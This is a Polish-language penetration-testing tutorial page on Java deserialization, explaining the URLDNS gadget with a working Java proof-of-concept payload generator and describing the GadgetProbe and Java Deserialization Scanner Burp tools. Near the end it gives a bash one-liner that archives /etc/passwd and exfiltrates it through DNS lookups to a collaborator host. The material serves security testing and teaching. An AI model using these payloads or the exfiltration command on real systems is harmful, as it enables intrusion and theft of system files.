# Java DNS Deserialization, GadgetProbe i Java Deserialization Scanner

{{#include ../../banners/hacktricks-training.md}}

## Żądanie DNS przy deserializacji

Klasa `java.net.URL` implementuje `Serializable`, co oznacza, że ta klasa może być serializowana.
```java
public final class URL implements java.io.Serializable {
```
Ta klasa ma **ciekawą zachowanie.** Z dokumentacji: “**Dwa hosty są uważane za równoważne, jeśli oba nazwy hostów mogą być rozwiązane na te same adresy IP**”.\
W związku z tym, za każdym razem, gdy obiekt URL wywołuje **jakąkolwiek** z **funkcji `equals`** lub **`hashCode`**, **żądanie DNS** w celu uzyskania adresu IP zostanie **wysłane**.

**Wywołanie** funkcji **`hashCode`** **z** obiektu **URL** jest dość proste, wystarczy wstawić ten obiekt do `HashMap`, która ma być deserializowana. Dzieje się tak, ponieważ **na końcu** funkcji **`readObject`** z `HashMap` ten kod jest wykonywany:
```java
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[   ...   ]
for (int i = 0; i < mappings; i++) {
[   ...   ]
putVal(hash(key), key, value, false, false);
}
```
To **wykona** `putVal` z każdą wartością wewnątrz `HashMap`. Ale bardziej istotne jest wywołanie `hash` z każdą wartością. Oto kod funkcji `hash`:
```java
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
```
Jak możesz zauważyć, **podczas deserializacji** **`HashMap`** funkcja `hash` będzie **wykonywana dla każdego obiektu** i **podczas** wykonania **`hash`** **wykona się** `.hashCode()` obiektu. Dlatego, jeśli **deserializujesz** **`HashMap`** **zawierającą** obiekt **URL**, obiekt **URL** **wykona** `.hashCode()`.

Teraz przyjrzyjmy się kodowi `URLObject.hashCode()`:
```java
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;
```
Jak widać, gdy `URLObject` wykonuje `.hashCode()`, wywoływana jest `hashCode(this)`. Kontynuując, możesz zobaczyć kod tej funkcji:
```java
protected int hashCode(URL u) {
int h = 0;

// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();

// Generate the host part.
InetAddress addr = getHostAddress(u);
[   ...   ]
```
Możesz zobaczyć, że `getHostAddress` jest wykonywane dla domeny, **uruchamiając zapytanie DNS**.

Dlatego ta klasa może być **wykorzystana** w celu **uruchomienia** **zapytania DNS** w celu **zademonstrowania**, że **deserializacja** jest możliwa, a nawet do **ekstrakcji informacji** (możesz dodać jako subdomenę wynik wykonania polecenia).

### Przykład kodu ładunku URLDNS

Możesz znaleźć [kod ładunku URDNS od ysoserial tutaj](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). Jednak, aby ułatwić zrozumienie, jak to zakodować, stworzyłem własny PoC (oparty na tym z ysoserial):
```java
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}

public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);

//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}


class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(URL u) throws IOException {
return null;
}

protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
```
### Więcej informacji

- [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
- W oryginalnym pomyśle ładunek commons collections został zmieniony, aby wykonać zapytanie DNS, co było mniej niezawodne niż zaproponowana metoda, ale oto post: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)

## GadgetProbe

Możesz pobrać [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) z Burp Suite App Store (Extender).

**GadgetProbe** spróbuje ustalić, czy niektóre **klasy Java istnieją** na klasie Java serwera, abyś mógł wiedzieć **czy** jest **vulnerable** na jakieś znane exploity.

### Jak to działa

**GadgetProbe** użyje tego samego **ładunku DNS z poprzedniej sekcji**, ale **przed** uruchomieniem zapytania DNS spróbuje **zdeserializować dowolną klasę**. Jeśli **dowolna klasa istnieje**, **zapytanie DNS** zostanie **wysłane**, a GadgetProbe zanotuje, że ta klasa istnieje. Jeśli **żądanie DNS** **nigdy nie zostanie wysłane**, oznacza to, że **dowolna klasa nie została zdeserializowana** pomyślnie, więc albo nie jest obecna, albo **nie jest serializowalna/eksploatowalna**.

W repozytorium github, [**GadgetProbe ma kilka list słów**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) z klasami Java do przetestowania.

![https://github.com/BishopFox/GadgetProbe/blob/master/assets/intruder4.gif](<../../images/intruder4 (1) (1).gif>)

### Więcej informacji

- [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)

## Skaner deserializacji Java

Ten skaner można **pobrać** z Burp App Store (**Extender**).\
**Rozszerzenie** ma **pasywne** i aktywne **możliwości**.

### Pasywne

Domyślnie **sprawdza pasywnie** wszystkie żądania i odpowiedzi wysyłane **w poszukiwaniu** **magicznych bajtów serializacji Java** i wyświetli ostrzeżenie o podatności, jeśli coś zostanie znalezione:

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../images/image (765).png>)

### Aktywne

**Testowanie ręczne**

Możesz wybrać żądanie, kliknąć prawym przyciskiem myszy i `Wyślij żądanie do DS - Testowanie ręczne`.\
Następnie, w zakładce _Skaner deserializacji_ --> _zakładka testowania ręcznego_ możesz wybrać **punkt wstawienia**. I **uruchomić testowanie** (Wybierz odpowiedni atak w zależności od używanego kodowania).

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../images/3-1.png)

Nawet jeśli to nazywa się "Testowanie ręczne", jest dość **zautomatyzowane**. Automatycznie sprawdzi, czy **deserializacja** jest **vulnerable** na **jakikolwiek ładunek ysoserial**, sprawdzając biblioteki obecne na serwerze WWW i podświetli te, które są podatne. Aby **sprawdzić** **podatne biblioteki**, możesz wybrać uruchomienie **Javas Sleeps**, **sleeps** poprzez **zużycie CPU**, lub używając **DNS**, jak wcześniej wspomniano.

**Eksploatacja**

Gdy zidentyfikujesz podatną bibliotekę, możesz wysłać żądanie do _Zakładki Eksploatacji_.\
W tej zakładce musisz **wybrać** **punkt wstrzyknięcia** ponownie, **wpisać** **podatną bibliotekę**, dla której chcesz stworzyć ładunek, oraz **komendę**. Następnie po prostu naciśnij odpowiedni przycisk **Atak**.

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../images/4.png)

### Informacje o eksfiltracji DNS deserializacji Java

Spraw, aby twój ładunek wykonał coś takiego jak poniżej:
```bash
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
```
### Więcej informacji

- [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)

{{#include ../../banners/hacktricks-training.md}}